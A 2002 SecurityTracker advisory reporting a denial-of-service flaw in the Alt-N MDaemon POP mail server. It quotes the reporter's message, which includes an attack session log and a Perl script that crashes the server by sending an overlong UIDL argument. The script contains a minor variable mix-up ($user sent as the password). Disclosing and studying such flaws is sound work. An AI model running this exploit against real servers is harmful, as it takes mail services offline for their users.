Alt-N MDaemon POP Mail Server Lets Remote Authenticated Users Crash the Mail Services
|
|
SecurityTracker Alert ID: 1005491 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 28 2002
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Version(s): 6.0.7 and prior versions
|
Description: A denial of service vulnerability was reported in Alt-N's MDaemon mail server. A remote authenticated user can send specially crafted commands to the POP server to kill the MDaemon mail server process.
It is reported that a remote authenticated user can send the DELE or UIDL commands with long arguments (32 bytes and longer) to cause all of MDaemon's services to close.
A demonstration exploit script is provided in the Source Message.
|
Impact: A remote authenticated user can cause the MDaemon mail services to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.altn.com/Products/Default.asp?product_id=MDaemon (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: D4rkGr3y <grey_1999@mail.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Oct 2002 19:49:45 +0300
From: D4rkGr3y <grey_1999@mail.ru>
Subject: MDaemon SMTP/POP/IMAP server DoS
|
######################################################
#Product: MDaemon SMTP/POP/IMAP server #
#Authors: Alt-N Technologies Ltd [www.mdaemon.com] #
#Vulnerable versions: v.6.0.7 and bellow #
#Vulnerability: buffer overflow #
#Bug&exploit by D4rkGr3y [www.dhgroup.org] #
######################################################
#Overview#--------------------------------------------------------------#
From MDaemon's help file:
"MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
commonplace on UNIX hosts and the Internet to Windows based servers
and microcomputers. MDaemon is designed to manage the email needs of
any number of individual users and comes complete with a powerful set
of integrated tools for managing mail accounts and message formats.
MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
with LDAP support, an integrated browser-based email client, content
filtering, spam blockers, extensive security features, and more."
#Problem#----------------------------------------------------------------#
Bug founded in MDaemon's pop-server. It's possible to kill MDaemon by
sending long arguments (32b and above) with DELE or UIDL commands.
To do this u must have at least mail-account on vulnerable host.
After geting long request from client, all MDaemon's Services will be
closed (smtp, imap, pop, (?)worldclient).
Here the log of attack on local MDaemon POP-server:
+OK dark.ru POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7 <MDAEMON-F200210
271036.AA3656130MD0012@dark.ru>
USER D4rkGr3y
+OK D4rkGr3y... Recipient ok
PASS cool-pass
+OK D4rkGr3y@dark.ru's mailbox has 1 total messages (18356 octets).
UIDL 11111111111111111111111111111111
Connection to host lost...
#Exploit#----------------------------------------------------------------#
#!/usr/bin/perl
#MDaemon SMTP/POP/IMAP server remote DoS exploit by D4rkGr3y
use IO::Socket;
$host = "[vuln_host]";
$login = "[login]";
$pass = "[pass]";
$port = "110";
$data = "1";
$num = "32";
$buf .= $data x $num;
$socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp"
, Type => SOCK_STREAM)
or die "Couldn't connect: @!\n";
print $socket "USER $login\n";
print $socket "PASS $user\n";
print $socket "UIDL $buf\n";
close($socket);
#EOF
Best regards www.dhgroup.org
D4rkGr3y icq 540981
|
|
